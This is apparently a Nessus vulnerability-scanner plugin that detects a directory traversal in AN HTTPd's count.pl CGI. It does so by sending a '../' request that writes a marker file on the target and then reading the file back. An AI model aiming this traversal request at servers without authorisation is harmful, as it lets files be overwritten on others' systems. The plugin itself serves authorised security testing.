AN HTTPd count.pl Traversal Arbitrary File Overwrite

2003-04-27T00:00:00
ID AN_HTTPD_COUNT_CGI.NASL
Type nessus
Reporter This script is Copyright (C) 2003-2020 Tenable Network Security, Inc.
Modified 2003-04-27T00:00:00

Description

The remote web server is running a CGI called 'count.pl' which is affected by a directory traversal vulnerability. An attacker could exploit this in order to overwrite any existing file on the remote server, with the privileges of the httpd server.

                                        
                                            #TRUSTED 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
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

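if (description)
{
 script_id(11555);
 script_version("1.22");
 script_set_attribute(attribute:"plugin_modification_date", value:"2020/03/18");
 script_bugtraq_id(7397);
 script_name(english:"AN HTTPd count.pl Traversal Arbitrary File Overwrite");
 # The check is intrusive: it makes count.pl create a file on the target
 # (see write_file() below), which is why it is categorised ACT_ATTACK and
 # gated on paranoid reporting further down.
 script_summary(english:"Creates a file on the remote server");

 script_set_attribute(attribute:"synopsis", value:
"The remote web server is affected by a directory traversal
vulnerability.");
 # Wording fix in the user-facing description: "an directory" -> "a directory".
 script_set_attribute(attribute:"description", value:
"The remote web server is running a CGI called 'count.pl' which is
affected by a directory traversal vulnerability. An attacker could
exploit this in order to overwrite any existing file on the remote
server, with the privileges of the httpd server.");
 script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/319354/30/0/threaded");
 script_set_attribute(attribute:"solution", value:"There is no known solution at this time.");
 # Scoring: remote, unauthenticated, no user interaction; the impact is the
 # arbitrary file overwrite described in the rationale attribute below.
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:P");
 script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H");
 script_set_attribute(attribute:"cvss_score_source", value:"manual");
 script_set_attribute(attribute:"cvss_score_rationale", value:"This vulnerability could be used to overwrite any existing file on the remote server.");
 script_set_cvss_temporal_vector("CVSS2#E:H/RL:W/RC:ND");
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 script_set_attribute(attribute:"exploit_available", value:"true");

 script_set_attribute(attribute:"plugin_publication_date", value:"2003/04/27");

 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_set_attribute(attribute:"potential_vulnerability", value:"true");
 script_end_attributes();

 # Active check that modifies the target (writes a file), hence ACT_ATTACK
 # rather than ACT_GATHER_INFO.
 script_category(ACT_ATTACK);

 script_copyright(english:"This script is Copyright (C) 2003-2020 Tenable Network Security, Inc.");

 script_family(english:"CGI abuses");

 script_dependencies("find_service1.nasl", "http_version.nasl");
 # Only scheduled when the scan policy enables paranoid reporting; the
 # report_paranoia check at run time enforces the same condition.
 script_require_keys("Settings/ParanoidReport");
 script_require_ports("Services/www", 80);
 exit(0);
}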

include('audit.inc');
include('global_settings.inc');
include('misc_func.inc');
include('http.inc');
include('spad_log_func.inc');
include('global_settings_nlib.inc');
include('audit.inc');

# Second gate on top of the Settings/ParanoidReport dependency: an intrusive
# write test must never run at a lower paranoia level than "Paranoid" (2).
if (report_paranoia < 2)
{
  audit(AUDIT_PARANOID);
}

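##
#
# Record one request/response exchange for the report and the debug log.
#
# @param r  - the array returned by http_send_recv3() for the request that
#             was just sent (may be NULL when no response came back)
#
# @return TRUE when a response was received, FALSE when 'r' is NULL
#
# Side effects: appends the raw request to the global 'requests' list and
# the formatted response to the global 'output' string; both are handed to
# security_report_v4() at the end of the script.
#
##
function log_exchange(r)
{
  local_var req, new_out;

  req = http_last_sent_request();
  requests[max_index(requests)] = req;
  spad_log(message:req);

  # Check for a missing response BEFORE indexing r[0..2]; the original code
  # formatted the response first and only then tested for NULL.
  if (isnull(r)) return FALSE;

  new_out = 'Response: ' + r[0] + ' ' + r[1] + ' ' + r[2] + '\n\n';
  output += new_out;
  spad_log(message:new_out);
  return TRUE;
}

##
#
# Try to write a file using the vulnerable count.pl script
# 
# @param dirs   - a list of CGI directories use with count.pl
# @return NULL
#
# Uses the globals 'file' (random marker file name), 'port', 'requests',
# 'output' and 'vuln', all set at top level before this function is called.
# For each directory the function (1) checks that the marker file does not
# exist yet, (2) asks count.pl to create it one level up via "?../", and
# (3) fetches it again; a body containing '1' after step 3 sets 'vuln'.
# The marker file is left on the target: the script has no cleanup step.
# Any request that gets no response at all ends the script, since a host
# that stops answering mid-test cannot be assessed either way.
#
##
function write_file(dirs)
{
  local_var dir, r, res;

  foreach dir (dirs)
  {
    # 1. Pre-check: the marker must not already be there, otherwise step 3
    #    could not tell our write from pre-existing content.
    # follow_redirect parameter only used to distinguish between subsequent calls in flatline
    r = http_send_recv3(method:'GET', item:dir + "/" + file, port:port, follow_redirect:1);
    if (!log_exchange(r:r)) exit(0, 'No response received from the remote host');
    res = r[2];
    # NOTE(review): this is a substring test, so any error page whose body
    # contains the digit '1' also matches; confirm count.pl's exact output
    # format before tightening it.
    if ('1' >< res) exit(0, 'Test file already exists on the remote host'); # Exists already ?!

    # 2. Trigger the traversal: count.pl is asked to use "../<file>" as its
    #    counter file, which should create it in the parent directory.
    r = http_send_recv3(method:'GET', item:dir + "/count.pl?../" + file, port:port);
    if (!log_exchange(r:r)) exit(0, 'No response received from the remote host');

    # 3. Fetch the marker file; a body containing '1' (the fresh counter
    #    value) means the write succeeded.
    r = http_send_recv3(method:'GET', item:dir + "/" + file, port:port, follow_redirect:2);
    if (!log_exchange(r:r)) exit(0, 'No response received from the remote host');
    res = r[2];
    if ('1' >< res)
    {
      vuln = TRUE;
      break;
    }
  }
}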

# Web server port under test (Services/www, falling back to 80).
port = get_http_port(default:80);

# Name of the marker file the test tries to create: two random 8-character
# hex strings so it will not collide with anything already on the server.
file = 'nessus-' + rand_str(length:8, charset:'0123456789ABCDEF') + '-' + rand_str(length:8, charset:'0123456789ABCDEF');

# Global state that write_file() fills in.
vuln = FALSE;
requests = make_list();
output = 'Received responses:\n\n';

# Directories to probe: every known CGI directory followed by '/isapi' when
# thorough tests are on and CGI scanning is not disabled; '/isapi' alone
# otherwise. make_list() flattens the list returned by cgi_dirs(), so the
# order (cgi dirs first, then '/isapi') is the same as appending it.
if (thorough_tests && !get_kb_item('Settings/disable_cgi_scanning'))
  dirs = make_list(cgi_dirs(), '/isapi');
else
  dirs = make_list('/isapi');

write_file(dirs:dirs);

if (!vuln) audit(AUDIT_HOST_NOT, 'affected');

# Report the full request/response trail gathered by write_file().
security_report_v4(
  port:port,
  generic:TRUE,
  output:output,
  request:requests,
  severity:SECURITY_WARNING
);